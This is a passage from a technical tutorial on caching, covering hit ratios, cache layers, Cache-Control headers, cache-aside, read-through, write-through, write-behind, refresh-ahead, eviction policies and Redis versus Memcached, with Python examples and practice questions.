The analogy is a desk. The papers you are working with sit on the desk (cache); the rest live in the filing cabinet across the room (origin). The desk is tiny and the cabinet is huge, but you spend most of your day reaching only for the desk — because what you needed a minute ago is usually what you need now.
REAL ACCESS DISTRIBUTIONS ARE ZIPFIAN, NOT UNIFORM
requests
|*
|*
|**
|***
|*****
|*********
|*******************
+-------------------------------------> items ranked by popularity
^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^
top 20% of items the long tail: 80% of items,
= ~80% of requests ~20% of requests
Consequence: a cache holding only the top 20% of items serves ~80% of
traffic. You do not need to cache much to remove most of the load.
# Why the shape of the distribution decides whether caching is worth it.
def simulate(distribution, cache_size, requests):
cache, hits = set(), 0
for item in distribution(requests):
if item in cache:
hits += 1
else:
if len(cache) >= cache_size:
cache.pop() # crude eviction; see 5.2
cache.add(item)
return hits / requests
# Uniform over 1M items, cache of 10k -> hit rate ~1%. Caching is pointless.
# Zipfian over 1M items, cache of 10k -> hit rate ~85%. Caching is transformative.
#
# The practical test before building a cache: plot request counts per key from
# your access logs. If the curve is flat, a cache will not help you.
Locality is also why caching appears at every level of every computer system, with the same structure repeated at different scales:
| Level | Cache | Backing store | Speed ratio |
|---|---|---|---|
| CPU | L1/L2/L3 cache | Main memory | ~100x |
| Operating system | Page cache | Disk | ~1,000x |
| Database | Buffer pool | Data files | ~1,000x |
| Application | In-process / Redis | Database | ~100x |
| Network | CDN edge | Origin server | ~10x |
| Browser | HTTP cache | Network | ~1,000x |
The corollary is the part people forget: a cache is only useful if the working set fits. If the actively-requested data is 500 GB and your cache is 10 GB, you will thrash — evicting entries just before they are needed again — and pay cache overhead for almost no benefit.
Key Takeaways
- Caches work because access patterns are non-uniform, not because memory is fast.
- Temporal locality (recently used again soon) is what most application caches exploit.
- Zipfian traffic means caching ~20% of items typically serves ~80% of requests.
- Check the distribution first; a flat access curve or a working set larger than the cache makes caching useless.
🧪 Practice
- Take an access log you have and count requests per key. Plot or rank them — is the distribution Zipfian or flat?
- Explain why a cache in front of a randomly-accessed 1 TB dataset with 8 GB of RAM will perform badly.
- Interview: When is adding a cache the wrong solution to a slow endpoint? (Hint: think about write-heavy paths, uniform access, and what a cache does to correctness that an index does not.)
Cache Hit Ratio and Effectiveness
"We added a cache" is not a result. The only number that matters is the hit ratio — the fraction of requests served from the cache — and its relationship to latency and origin load is non-linear in a way that changes how you prioritize work.
The hit ratio is simple to define: hits / (hits + misses). Its consequences
are less obvious, because the same one-percentage-point improvement is worth
wildly different amounts depending on where you start.
CACHE_MS, ORIGIN_MS = 1, 50
TOTAL_RPS = 10_000
def effective_latency(hit_ratio):
# A miss usually costs cache lookup PLUS origin, but the cache lookup is
# negligible here, so this is the standard simplification.
return hit_ratio * CACHE_MS + (1 - hit_ratio) * ORIGIN_MS
def origin_rps(hit_ratio):
return TOTAL_RPS * (1 - hit_ratio)
for h in (0.0, 0.50, 0.90, 0.95, 0.99, 0.999):
print(f"{h:6.1%} latency {effective_latency(h):6.2f} ms origin {origin_rps(h):8.0f} RPS")
# 0.0% latency 50.00 ms origin 10000 RPS
# 50.0% latency 25.50 ms origin 5000 RPS
# 90.0% latency 5.90 ms origin 1000 RPS
# 95.0% latency 3.45 ms origin 500 RPS
# 99.0% latency 1.49 ms origin 100 RPS
# 99.9% latency 1.05 ms origin 10 RPS
Read that table twice. Going from 0% to 90% cuts origin load by 10x. Going from 90% to 99% cuts it by another 10x — the same nine percentage points that barely move average latency (5.9 ms to 1.5 ms) remove 900 requests per second from your database. Origin load scales with the miss rate, so improvements at the top of the range are where the capacity savings live.
THE MISS RATE IS WHAT YOU ARE ACTUALLY OPTIMIZING
hit ratio miss rate origin load (relative)
90% 10% 1.0x
95% 5% 0.5x <- half the origin traffic
99% 1% 0.1x <- one tenth
99.9% 0.1% 0.01x <- one hundredth
Talking about "hit ratio going from 99% to 99.5%" sounds trivial.
Saying "origin load halved" does not.
But hit ratio alone can mislead in two ways, and both show up in real systems:
| Trap | What happens |
|---|---|
| Measuring the wrong keys | A 99% hit ratio dominated by one trivially cacheable key hides a 20% ratio on everything else |
| Ignoring miss cost | If a miss costs 2 seconds, a 95% hit ratio still means a terrible p99 |
| Counting only reads | Invalidation churn from writes can make a cache do net harm |
| Cold-start behaviour | A restart drops to 0% instantly — can the origin survive that? |
The metrics worth exporting, therefore, are hit ratio segmented by key prefix, miss latency as its own distribution, eviction rate (rising evictions mean the working set no longer fits), and cache memory utilization.
Key Takeaways
- Hit ratio is the primary cache metric, but origin load scales with the miss rate.
- Improvements near the top (95% to 99%) deliver the largest absolute reduction in backend traffic.
- Segment hit ratio by key type; one hot key can mask a badly-performing cache.
- Track eviction rate and miss latency too, and know what happens on a cold start.
🧪 Practice
- At 20,000 RPS with a 92% hit ratio, compute origin RPS. What hit ratio would halve it?
- A cache has a 97% hit ratio, 1 ms hits and 400 ms misses. Compute the mean and estimate the p99. Which is the user's experience?
- Interview: Your cache reports a 99% hit ratio but the database is still overloaded. Give three explanations. (Hint: consider which requests are counted, which keys dominate, and what writes are doing.)
Cache Layers Across the Stack
A single request passes through many places where an answer could already be waiting. Each is a cache, each has different scope and control, and designing deliberately across them is what turns a 200 ms request into a 5 ms one — or into a confusing bug where users see stale data and nobody can say which layer served it.
The organizing principle is that the earlier a request is answered, the cheaper it is — and the less control you have over invalidating it. A browser cache costs you nothing and you cannot clear it; a database buffer pool you control completely but it saves the least.
THE FULL CACHE CHAIN FOR ONE REQUEST
[browser memory/disk cache] 0 ms you cannot invalidate it
| miss
[ISP / corporate proxy] ~5 ms you cannot even see it
| miss
[CDN edge PoP] ~10 ms purgeable via API, seconds to minutes
| miss
[reverse proxy / gateway] ~1 ms you control it fully
| miss
[application in-process cache] ~0.1 ms per-instance, inconsistent across fleet
| miss
[distributed cache: Redis] ~1 ms shared, invalidatable, one more hop
| miss
[database buffer pool] ~0.1 ms managed by the database
| miss
[disk] ~1-10 ms the actual work
Each layer that answers removes ALL load from every layer below it.
# A layered read path. Note that each layer has a different TTL — shorter as
# you go outward, because outer layers are harder to invalidate.
def get_product(product_id, local, redis, db):
key = f"product:{product_id}"
# L1: in-process. Nanoseconds, but each instance has its own copy, so a
# short TTL bounds how long the fleet can disagree with itself.
if (v := local.get(key)) is not None:
metrics.increment("cache.hit", tags={"layer": "local"})
return v
# L2: shared. One network hop, but consistent across all instances and
# invalidatable from anywhere.
if (v := redis.get(key)) is not None:
local.set(key, v, ttl=5) # populate L1 on the way back
metrics.increment("cache.hit", tags={"layer": "redis"})
return v
# L3: the origin.
v = db.query_product(product_id)
redis.setex(key, 300, v) # 5 minutes shared
local.set(key, v, ttl=5) # 5 seconds per-instance
metrics.increment("cache.miss")
return v
| Layer | Scope | Latency | Invalidation control | Best for |
|---|---|---|---|---|
| Browser | One user | 0 ms | None (only via URL) | Immutable, versioned assets |
| CDN edge | One region | ~10 ms | Purge API | Static and public content |
| Reverse proxy | One datacenter | ~1 ms | Full | Rendered pages, API responses |
| In-process (L1) | One instance | ~0.1 ms | Full but per-instance | Tiny hot values, config |
| Distributed (L2) | Whole fleet | ~1 ms | Full and consistent | Sessions, query results |
| Database buffer | One database | ~0.1 ms | Automatic | Pages the engine chooses |
The multi-layer design brings one specific hazard: the shortest TTL you can invalidate is the longest one in the chain. If a browser holds a response for an hour, purging the CDN changes nothing for that user. This is why the standard pattern for assets is content-hashed URLs with immutable, year-long caching — you never invalidate, you change the URL.
Key Takeaways
- Every layer that answers removes all load from every layer beneath it.
- Control decreases and cheapness increases as you move outward toward the client.
- Use shorter TTLs for layers you cannot invalidate precisely, longer for ones you can.
- You cannot recall what a browser has cached — version the URL instead of invalidating.
🧪 Practice
- Trace a request for a product page through every cache layer and give each a TTL with justification.
- Explain why an in-process cache with a 5-minute TTL causes users to see different data on refresh across a 20-instance fleet.
- Interview: You deployed a fix but some users still see the old behaviour after an hour. Walk through the diagnosis. (Hint: enumerate every layer that could hold a copy, starting with the one you control least.)
Client, CDN, Application, and Database Caches
The previous topic laid out the chain; this one is about what each layer is actually for, because putting the right data in the right layer is most of the design work. The decision rests on three properties of the data: how public it is, how often it changes, and how bad staleness would be.
Client caches live in the user's browser or app. They are free, infinitely scalable, and completely outside your control once served. That makes them perfect for immutable content and dangerous for anything else.
CDN caches hold public, shareable content near users. Their unit of caching
is the URL, so anything varying by user is either uncacheable there or requires
careful Vary handling (Chapter 2.4).
Application caches hold computed results — an assembled dashboard, a rendered template, a query result — where the expense is CPU or database work rather than distance.
Database caches are largely automatic: the buffer pool holds hot pages, and the query plan cache holds parsed plans. You influence them by sizing memory and by keeping the hot dataset small, not by writing code.
WHAT BELONGS WHERE
data layer TTL why
------------------------------------------------------------------------
app.a3f9c2.js (hashed filename) browser + CDN 1 year immutable
product image CDN 30 days public, static
product catalogue page CDN 5 min public, changes
logged-in user's dashboard application 30 s private, computed
user session distributed 30 min private, shared
across instances
feature flags in-process 10 s tiny, hot, read
on every request
account balance NOT CACHED - staleness is
unacceptable
### Client + CDN: immutable asset. Never invalidated; the hash IS the version.
GET /static/app.a3f9c2.js
Cache-Control: public, max-age=31536000, immutable
### CDN only, not the browser: shared cache holds it, clients revalidate.
GET /api/products
Cache-Control: public, max-age=0, s-maxage=300, stale-while-revalidate=60
# ^browser: always revalidate
# ^shared cache: 5 minutes
### Private: may be stored by the browser, never by a shared cache.
GET /api/me/dashboard
Cache-Control: private, max-age=30
### Never cache anywhere.
GET /api/accounts/7/balance
Cache-Control: no-store
# Application-layer caching is where judgement is needed, because you choose
# the key — and the key defines correctness.
def dashboard(user, redis, db):
# The key MUST include every input that changes the output. Forgetting the
# tenant, the locale, or the permission set is how one user sees another's
# data — the most serious caching bug there is.
key = f"dash:v3:{user.tenant_id}:{user.id}:{user.locale}:{user.role}"
# ^ a version prefix lets you invalidate the whole namespace by
# bumping it, without deleting keys one by one
if (cached := redis.get(key)) is not None:
return cached
result = build_dashboard(user, db) # expensive: several queries
redis.setex(key, 30, result)
return result
| Layer | Caches | Keyed by | Typical TTL | Main risk |
|---|---|---|---|---|
| Client | Assets, private responses | URL | Long / short | Cannot be recalled |
| CDN | Public responses | URL (+ Vary) | Minutes to days | Serving private data publicly |
| Application | Computed results | A key you design | Seconds to minutes | A key missing an input |
| Database | Pages and plans | Managed | Automatic | Working set exceeding memory |
Two rules carry most of the weight. Include every input in the key — tenant, user, locale, role, feature flags, API version. And never cache what you cannot afford to serve stale: balances, permissions checks, inventory counts during checkout. When you are unsure, cache with a short TTL and measure whether the hit ratio justifies the risk at all.
Key Takeaways
- Match data to layer by how public it is, how fast it changes, and how bad staleness would be.
- Immutable, content-hashed assets get year-long client and CDN caching.
privateversuspublicinCache-Controlis what keeps one user's data out of a shared cache.- An application cache key must include every input that affects the output.
🧪 Practice
- Assign a layer, TTL, and
Cache-Controlheader to: a company logo, a search results page, a user's notification count, a PDF invoice.- Write the cache key for a paginated, filtered, localized product list and justify each component.
- Interview: A bug shows one customer another customer's dashboard. What caching mistake would produce that? (Hint: the bug is in one line, and it is about what is absent from it.)
<a id="52-caching-strategies"></a>
5.2 Caching Strategies
A caching strategy answers two questions — who populates the cache on a read, and what happens to the cache on a write — and the four canonical combinations have very different consistency and durability properties.
Cache-Aside
Cache-aside (also called lazy loading) is the most widely used caching pattern
because it requires nothing of the cache except get and set. The
application owns the logic: check the cache, and on a miss, fetch from the
database and populate the cache itself.
Its defining property is that the cache is never in the write path of the database. If the cache is unavailable, every read simply becomes a database read — degraded but working. That resilience is why cache-aside is the default choice.
CACHE-ASIDE READ CACHE-ASIDE WRITE
app --get--> [cache] app --write--> [database]
hit? return app --delete-> [cache]
miss: ^
app --query--> [database] |
app --set----> [cache] invalidate, do NOT update:
return a concurrent write could otherwise
leave a stale value behind
def get_user(user_id, cache, db):
key = f"user:{user_id}"
if (cached := cache.get(key)) is not None:
return cached # hit
user = db.query_user(user_id) # miss: load from origin
if user is not None:
cache.setex(key, 300, user) # populate, with a TTL
return user
def update_user(user_id, data, cache, db):
db.update_user(user_id, data) # 1. write the origin first
cache.delete(f"user:{user_id}") # 2. then INVALIDATE
# Order matters. Deleting first leaves a window where a concurrent read
# repopulates the cache with the OLD value just before the write lands.
#
# Delete rather than update: two concurrent writers that both "update" the
# cache can apply their writes to the database in one order and to the
# cache in the other, leaving the cache permanently wrong. A delete forces
# the next reader to reload the truth.
Cache-aside has one well-known race that no ordering fully removes:
THE STALE-REPOPULATION RACE
reader writer
------ ------
cache.get(k) -> MISS
db.read(k) -> v1
db.write(k, v2)
cache.delete(k) (deletes nothing)
cache.set(k, v1) <- stale value, for the
full TTL
Mitigations, in increasing order of cost:
- a short TTL, so the damage is bounded
- set only if absent (SET NX), so a fresher value is not overwritten
- delayed double-delete: invalidate again a few hundred ms after the write
- versioned keys, so a write changes the key rather than the value
| Property | Cache-aside |
|---|---|
| Who populates | The application, on a miss |
| Cache failure | Degrades to direct database reads — the system survives |
| Data in cache | Only what has been requested (no wasted memory) |
| First request cost | Always a miss (cold start is slow) |
| Consistency | Eventual; a narrow stale-repopulation race exists |
| Code | Duplicated at every call site unless wrapped |
That last row is its main drawback: the get/miss/load/set logic appears everywhere, and one call site that forgets to invalidate on write becomes a lasting correctness bug. Wrapping it in a repository or decorator is the usual remedy — which is essentially reinventing read-through, the next topic.
Key Takeaways
- The application controls the cache: check, load on miss, populate.
- The cache is not in the database write path, so cache failure degrades rather than breaks.
- On writes, update the database first, then delete the key — do not update it.
- A stale-repopulation race remains; bound it with short TTLs or versioned keys.
🧪 Practice
- Implement cache-aside for a product lookup, including the invalidation on update and delete.
- Draw the interleaving that leaves a stale value in the cache and show how a delayed double-delete narrows it.
- Interview: Why delete the cache entry on write instead of updating it with the new value? (Hint: consider two writers racing, and which order each of the two systems ends up applying.)
Read-Through
Cache-aside scatters cache logic across the codebase. Read-through moves it
behind the cache itself: the application asks the cache for a key, and if the
cache does not have it, the cache fetches from the origin, stores the result,
and returns it. The caller sees one uniform interface and never writes a
if miss: load branch.
The gain is not just tidiness. Centralizing the load path means you can implement miss coalescing, consistent TTL policy, and metrics once, correctly, instead of relying on every developer to repeat the pattern.
CACHE-ASIDE (app orchestrates) READ-THROUGH (cache orchestrates)
app -> cache miss app -> cache miss
app -> db cache -> db
app -> cache set cache stores
app returns app <- cache value
3 app-side steps, repeated 1 app-side step; the loader is
at every call site configured once
class ReadThroughCache:
def __init__(self, backend, loader, ttl=300):
self._backend = backend # Redis, or an in-process store
self._loader = loader # how to fetch on a miss
self._ttl = ttl
self._locks = {} # per-key locks for miss coalescing
def get(self, key):
if (v := self._backend.get(key)) is not None:
return v
# Miss coalescing: without this, 500 concurrent misses on the same key
# issue 500 identical database queries (see Cache Stampede in 5.3).
lock = self._locks.setdefault(key, threading.Lock())
with lock:
if (v := self._backend.get(key)) is not None:
return v # another thread filled it
v = self._loader(key) # exactly one origin call
if v is not None:
self._backend.setex(key, self._ttl, v)
return v
# One configuration, used everywhere. No call site can forget the pattern.
users = ReadThroughCache(redis, loader=lambda k: db.query_user(int(k.split(":")[1])),
ttl=300)
user = users.get("user:7")
Many caching libraries and products implement read-through natively — Caffeine and Guava in Java, and cache products configured with a "cache loader". The pattern is also what a CDN does: on a miss it fetches from origin, stores, and serves, without the client knowing.
| Aspect | Cache-aside | Read-through |
|---|---|---|
| Load logic lives in | Every call site | One configured loader |
| Miss coalescing | Must be added per site | Natural to implement once |
| Flexibility | Any custom logic per call | Uniform; awkward for special cases |
| Cache failure | Degrades to direct reads | Cache is on the read path — failure needs an explicit fallback |
| Consistency on write | Application invalidates | Application still invalidates (read-through says nothing about writes) |
Two clarifications that avoid common confusion. Read-through addresses reads only — you still need a write strategy, which is the next three topics. And because the cache is now on the read path, an unavailable cache breaks reads unless the loader explicitly falls back to the origin — so the resilience advantage of cache-aside has to be rebuilt deliberately.
Key Takeaways
- Read-through hides the miss path inside the cache, giving one uniform read interface.
- Centralizing the loader is what makes miss coalescing and consistent TTLs practical.
- It governs reads only; a write strategy is still required.
- The cache sits on the read path, so add an explicit origin fallback for cache outages.
🧪 Practice
- Convert a cache-aside implementation into a read-through wrapper with a configurable loader and TTL.
- Add miss coalescing and demonstrate that 100 concurrent misses cause one origin call.
- Interview: What does read-through give you that cache-aside does not, and what does it cost? (Hint: think about what happens when the cache itself is down, and who is responsible for noticing.)
Write-Through
Read strategies decide what happens on a miss; write strategies decide what happens to the cache when data changes. Write-through takes the strictest approach: every write goes to the cache and the origin, synchronously, before the write is acknowledged.
The benefit is that the cache is never stale. A reader that hits the cache immediately after a write sees the new value, so read-your-writes holds through the cache — the property that makes stale-read bugs disappear.
WRITE-THROUGH
app --write--> [cache] --write--> [database]
|
<---------- ack -------+
<-- ack --
Both are updated before the client is told "done".
Read after write: guaranteed fresh from the cache.
Cost: every write pays BOTH latencies, and a cache failure fails the write.
def write_through(key, value, cache, db):
# Order: origin first, so a cache failure cannot leave the cache holding a
# value the database never accepted.
db.write(key, value) # durable, authoritative
try:
cache.setex(key, 300, value) # keep the cache exactly in step
except CacheUnavailable:
cache_delete_best_effort(key) # never leave a KNOWN-stale entry
raise # or degrade, but decide explicitly
# The subtlety people miss: strict write-through means writes populate the
# cache even for data nobody reads. On a write-heavy, read-light table that
# fills the cache with cold entries and evicts the hot ones — actively
# LOWERING the hit ratio. Write-through pays off only when written data is
# read soon afterwards.
Because the cache and the origin are updated under two separate operations, write-through is not atomic. A crash between the two leaves them inconsistent, which is why the origin is written first and the cache entry is deleted rather than left wrong on failure.
| Property | Write-through |
|---|---|
| Cache freshness | Always current — no stale reads through the cache |
| Write latency | Origin latency plus cache latency |
| Durability | Full — the origin is written before acknowledgement |
| Cache utilization | Poor if written data is rarely read |
| Failure of the cache | Write fails, or you accept an invalidation instead |
| Good for | Read-after-write workloads: profiles, settings, carts |
Write-through pairs naturally with read-through: together they give a cache that is always populated and always current, at the cost of write latency and wasted memory on write-only data. When writes vastly outnumber reads, cache-aside with invalidation is the better pairing — it only caches what someone actually asked for.
Key Takeaways
- Write-through updates cache and origin synchronously, so the cache is never stale.
- It guarantees read-your-writes through the cache, eliminating a whole class of bugs.
- Every write pays both latencies, and written-but-unread data pollutes the cache.
- The two writes are not atomic — write the origin first and delete the key on cache failure.
🧪 Practice
- Implement write-through for a user settings object and handle cache failure explicitly.
- Explain when write-through reduces the hit ratio, with a concrete workload.
- Interview: Write-through guarantees the cache matches the database. Under what failure does that stop being true? (Hint: there are two operations and no transaction spanning them.)
Write-Behind
Write-through makes every write pay the origin's latency. Write-behind (also called write-back) removes that: the write goes to the cache, is acknowledged immediately, and is flushed to the origin asynchronously — usually batched with other writes.
This is the highest-throughput write strategy by a wide margin, because it turns many small random origin writes into few large batched ones (the sequential-I/O advantage from Chapter 4.1), and because the client never waits for the origin at all.
It is also the only caching strategy that can lose acknowledged data, which makes it a durability decision rather than merely a performance one.
WRITE-BEHIND
app --write--> [cache] --ack immediately--> app (~0.5 ms)
|
| buffered, coalesced, flushed on a timer or batch size
v
[database] (later: ~seconds)
If the cache dies with unflushed writes, those writes are GONE — and the
client was told they succeeded.
Coalescing is the hidden win: 100 updates to the same key in one window
become ONE database write.
class WriteBehindCache:
def __init__(self, cache, db, flush_interval=1.0, max_batch=500):
self._cache, self._db = cache, db
self._dirty = {} # key -> latest value (coalescing)
self._lock = threading.Lock()
threading.Thread(target=self._flush_loop, daemon=True).start()
def write(self, key, value):
self._cache.set(key, value)
with self._lock:
self._dirty[key] = value # later writes overwrite earlier
return "ok" # acknowledged BEFORE durability
def _flush_loop(self):
while True:
time.sleep(self._flush_interval)
with self._lock:
batch, self._dirty = self._dirty, {}
if not batch:
continue
try:
self._db.write_batch(batch) # one round trip for many keys
except Exception:
with self._lock:
# Re-queue, but do not clobber newer values written since.
for k, v in batch.items():
self._dirty.setdefault(k, v)
metrics.increment("write_behind.flush_failed", len(batch))
The pattern is everywhere in systems programming — a database buffer pool is write-behind onto data files, and an operating system's page cache is write-behind onto disk. Both are safe only because a write-ahead log makes the change durable first (Chapter 4.1), which is exactly the mitigation an application-level write-behind cache usually lacks.
| Property | Write-behind |
|---|---|
| Write latency | Cache latency only — the fastest option |
| Throughput | Highest; batching and coalescing multiply it |
| Durability | Data loss window equal to the flush interval |
| Origin load | Dramatically reduced |
| Read-after-write | Correct through the cache; wrong if reading the origin |
| Complexity | High: flush failures, ordering, shutdown draining |
| Good for | Counters, metrics, view counts, telemetry, session activity timestamps |
The suitability test is a single question: if the last N seconds of writes vanished, would anyone be harmed? For a page-view counter, no. For an order or a payment, catastrophically yes. Use write-behind only where the data is tolerant of loss, and always drain the buffer on graceful shutdown.
Key Takeaways
- Write-behind acknowledges at the cache and flushes to the origin asynchronously in batches.
- It gives the best write latency and throughput, and coalescing collapses repeated writes to one.
- It can lose acknowledged writes — the loss window is the flush interval.
- Restrict it to loss-tolerant data, and drain the buffer on shutdown.
🧪 Practice
- Implement a write-behind counter cache with coalescing and compute the origin write reduction for 10,000 increments across 100 keys per second.
- Describe exactly what is lost when the cache process is killed with a 1-second flush interval at 5,000 writes per second.
- Interview: Which data in a social media app is safe for write-behind and which is not? (Hint: sort by what a user would notice, and by what an auditor would.)
Refresh-Ahead
All the strategies so far are reactive: the cache learns a value is stale only when someone asks for it and pays the miss. Refresh-ahead is proactive — the cache reloads entries before they expire, so a popular key is never missing when a user arrives.
The motivation is the shape of the latency distribution. With a reactive cache, one unlucky user per TTL period pays the full origin latency for every hot key. At scale that is exactly what shows up as an ugly p99 — and it is entirely predictable, so it is entirely preventable.
REACTIVE TTL REFRESH-AHEAD
|---- served from cache ----|X| |---- served from cache --------|
^ |
TTL expires; the next | at 80% of the TTL, a
request pays 200 ms | background refresh
| reloads the value
Every TTL period, one user is v
punished for the whole cohort. No request ever sees a miss on a hot key.
def get_with_refresh_ahead(key, cache, loader, ttl=300, refresh_at=0.8):
entry = cache.get_with_metadata(key)
if entry is None: # true miss: load inline
value = loader(key)
cache.setex(key, ttl, value)
return value
age_fraction = entry.age_seconds / ttl
if age_fraction >= refresh_at and cache.try_lock(f"refresh:{key}", ttl=10):
# ^ only ONE worker refreshes; the rest
# keep serving the still-valid value
submit_background(lambda: cache.setex(key, ttl, loader(key)))
return entry.value # always served instantly
A closely related and often better technique is stale-while-revalidate: serve the expired value immediately and refresh in the background. HTTP has this built in (Chapter 5.4), and it converts an expiry from a latency spike into a brief window of slightly stale data.
Cache-Control: max-age=60, stale-while-revalidate=300
# ^ fresh for 60s
# ^ for 300s after that, serve the stale copy
# instantly AND refresh in the background
| Aspect | Reactive (TTL) | Refresh-ahead / stale-while-revalidate |
|---|---|---|
| p99 on hot keys | Spikes each TTL period | Flat |
| Origin load | Proportional to misses | Proportional to refreshes, whether needed or not |
| Wasted work | None | Refreshes keys that nobody asks for again |
| Freshness | Never stale past TTL | May serve slightly stale data |
| Complexity | Trivial | Needs background workers and a refresh lock |
The cost is real: refreshing everything wastes origin capacity on keys that will never be requested again. The practical rule is to refresh only demonstrably hot keys — those with recent access counts above a threshold — and let the long tail expire normally.
Key Takeaways
- Refresh-ahead reloads entries before expiry so users never pay the miss on hot keys.
- It flattens the p99 spike that a plain TTL creates once per period per key.
stale-while-revalidateachieves the same effect by serving stale and refreshing behind it.- Refresh only hot keys, and take a lock so one worker refreshes rather than all of them.
🧪 Practice
- Implement refresh-ahead triggering at 80% of TTL with a single-refresher lock.
- Explain how
stale-while-revalidatediffers from refresh-ahead in what the user receives.- Interview: Your p50 is 3 ms and your p99 is 250 ms, matching the origin latency exactly. What is happening and how do you fix it? (Hint: the p99 requests are not different requests — they are unluckily timed ones.)
Eviction Policies: LRU, LFU, FIFO, TTL
A cache is finite, so eventually it must remove something to make room. The eviction policy decides what, and it directly determines the hit ratio — a bad policy discards exactly the entries you were about to need.
The theoretical optimum (Bélády's algorithm) evicts the item that will be requested furthest in the future, which requires knowing the future. Every real policy is a heuristic that predicts future access from past behaviour.
THE FOUR CLASSIC POLICIES
LRU Least Recently Used evict what has not been touched longest
assumes temporal locality; the workhorse default
weakness: a single large scan evicts the whole working set
LFU Least Frequently Used evict what has been requested fewest times
resists scans; better for stable popularity
weakness: an old, once-popular item is hard to dislodge (needs ageing)
FIFO First In, First Out evict the oldest inserted, regardless of use
trivially cheap; ignores access entirely, so hit ratios are poor
TTL Time To Live evict when the entry is older than its TTL
not really an eviction policy: a FRESHNESS policy, used alongside one
from collections import OrderedDict
class LRUCache:
"""LRU in O(1): a hash map for lookup, ordering for recency."""
def __init__(self, capacity):
self._data = OrderedDict()
self._capacity = capacity
def get(self, key):
if key not in self._data:
return None
self._data.move_to_end(key) # mark as most recently used
return self._data[key]
def put(self, key, value):
if key in self._data:
self._data.move_to_end(key)
self._data[key] = value
if len(self._data) > self._capacity:
self._data.popitem(last=False) # evict the least recently used
# The scan problem, and why modern caches are not plain LRU.
#
# A nightly report reads 1,000,000 rows once. Plain LRU dutifully caches every
# one, evicting the hot working set that serves live traffic. The hit ratio
# collapses at 02:00 and recovers slowly.
#
# Real caches defend against this:
# - SEGMENTED LRU: new entries enter a small probation segment and are only
# promoted to the protected segment on a SECOND access. A one-time scan
# never reaches the protected area.
# - TinyLFU (Caffeine): a compact frequency sketch decides whether a new
# entry deserves to displace the eviction candidate at all.
# - Redis: approximate LRU/LFU by sampling a few keys rather than maintaining
# exact global order — O(1) memory, nearly the same hit ratio.
| Policy | Cost | Strength | Weakness |
|---|---|---|---|
| LRU | O(1) | Matches temporal locality | Destroyed by scans |
| LFU | O(1) approx | Resists scans; stable popularity | Stale popularity without ageing |
| FIFO | O(1) | Cheapest, simplest | Ignores access; low hit ratio |
| Random | O(1) | No metadata at all | Surprisingly decent; unpredictable |
| Segmented LRU / TinyLFU | O(1) | Scan-resistant, high hit ratio | More complex |
| TTL | O(1) | Bounds staleness | Not a capacity policy on its own |
Two practical notes. TTL and eviction are orthogonal: TTL bounds how wrong a value may be, while eviction bounds how much memory you use — you almost always want both. And rising eviction rate is the metric to alert on: it means the working set has outgrown the cache, and the hit ratio is about to fall.
Redis makes this explicit through maxmemory-policy, where the choice between
allkeys-lru (evict anything, cache behaviour) and volatile-lru (evict only
keys with a TTL, protecting persistent data) is one of the more consequential
configuration decisions in a shared Redis instance.
Key Takeaways
- Eviction policy predicts future access from past behaviour; LRU is the sensible default.
- A large scan destroys a plain LRU cache — segmented LRU and TinyLFU exist to prevent it.
- TTL bounds staleness, eviction bounds memory; they are complementary, not alternatives.
- Alert on eviction rate: it rises before the hit ratio falls.
🧪 Practice
- Trace LRU and LFU on the access sequence
A B C A B D A B Ewith a capacity of 3, and compare final contents.- Explain why
allkeys-lruis dangerous on a Redis instance that also holds non-cache data, and what to use instead.- Interview: Your hit ratio drops every night at 02:00 and recovers by 08:00. What is happening? (Hint: something reads a great deal of data exactly once, and your cache believes it matters.)
<a id="53-distributed-caching"></a>
5.3 Distributed Caching
Once a cache is shared by many application instances it becomes a distributed system of its own, with its own partitioning, failure, and consistency problems.
Redis and Memcached Architectures
An in-process cache is fast but private: twenty application instances hold twenty independent copies, disagree with each other, and lose everything on deploy. A distributed cache is a separate service all instances share, which gives one consistent view, survives application restarts, and can hold far more than any single process. The two dominant choices — Redis and Memcached — make opposite bets on what a cache should be.
Memcached is deliberately minimal: an in-memory key-value store of opaque byte strings, multi-threaded, with no persistence and no replication. Its simplicity is the feature — it scales vertically across cores and essentially never surprises you.
Redis is a data-structure server that happens to be used as a cache. Values can be strings, hashes, lists, sets, sorted sets, streams, and bitmaps, with atomic operations on each. It is single-threaded for command execution (so every operation is atomic without locks), and it offers persistence, replication, pub/sub, and server-side scripting.
MEMCACHED REDIS
[key] -> opaque bytes [key] -> string | hash | list | set |
sorted set | stream | bitmap
multi-threaded single-threaded command execution
no persistence RDB snapshots + AOF log (optional)
no replication replication + Sentinel + Cluster
client-side sharding only native Cluster mode (16384 hash slots)
LRU eviction 8 maxmemory policies
~1 MB value limit (default) 512 MB value limit
Memcached: "a cache, and nothing else."
Redis: "a fast data store you can use as a cache."
# Redis's value types are the reason to choose it — each avoids a read-modify-
# write round trip that a plain key-value store would force.
r.hset("user:7", mapping={"name": "Ada", "tier": "pro"})
r.hget("user:7", "tier") # read ONE field, not the whole object
r.zadd("leaderboard", {"ada": 4820})
r.zrevrange("leaderboard", 0, 9, withscores=True) # top 10, O(log n + 10)
r.incrby("views:post:42", 1) # atomic; no read-modify-write race
r.pfadd("uniques:2026-03-11", user_id) # HyperLogLog: ~12 KB for millions
r.pfcount("uniques:2026-03-11") # of unique values, ~0.8% error
# Single-threaded execution means a slow command blocks EVERYTHING.
r.keys("user:*") # O(n) over the whole keyspace — never in production
r.scan_iter("user:*") # cursor-based, incremental, safe
| Dimension | Memcached | Redis |
|---|---|---|
| Data types | Strings only | Rich structures |
| Threading | Multi-threaded | Single-threaded commands (I/O threads separate) |
| Memory efficiency | Slightly better for plain strings | More per-key overhead |
| Persistence | None | RDB and/or AOF |
| Replication | None | Built in |
| Clustering | Client-side hashing | Native Cluster mode |
| Atomic operations | Basic (incr, cas) | Extensive, plus Lua scripting |
| Best when | Pure cache, huge scale, simplicity | You need structures, atomicity, or persistence |
The choice in practice: Redis unless you specifically want the constraint of Memcached. Redis's extra capability costs little, and most teams eventually need at least atomic counters or sorted sets. Memcached remains attractive at very large scale for pure string caching, where its multi-threaded simplicity and lower per-key overhead pay off.
One warning that applies to Redis specifically: because it can persist, teams
start storing data there that is not reconstructible, and then a cache eviction
becomes data loss. Decide explicitly whether an instance is a cache (evictable,
allkeys-lru) or a store (never evict, noeviction), and never mix the two in
one instance.
Key Takeaways
- A distributed cache gives all instances one shared, consistent view that survives deploys.
- Memcached is a minimal multi-threaded string cache; Redis is a single-threaded data-structure server.
